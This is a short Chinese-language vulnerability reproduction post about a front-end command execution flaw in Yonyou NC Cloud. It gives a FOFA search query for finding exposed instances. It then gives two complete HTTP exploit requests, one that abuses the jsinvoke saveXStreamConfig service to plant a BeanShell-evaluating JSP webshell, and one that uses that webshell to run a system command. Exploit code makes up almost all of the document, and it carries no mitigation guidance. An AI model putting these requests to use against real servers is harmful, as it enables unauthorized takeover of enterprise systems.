用友NC Cloud前台命令执行漏洞
一、漏洞简介
NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
二、影响版本
- 用友NC Cloud
三、资产测绘
- fofa
app="用友-NC-Cloud"
- 登录页面
四、漏洞复现
- 通过poc上传webshell
823780482.jsp
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 253
Connection: close
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/823780482.jsp"]}
- 通过webshell执行命令
POST /823780482.jsp?error=bsh.Interpreter HTTP/1.1
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 98
Connection: close
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())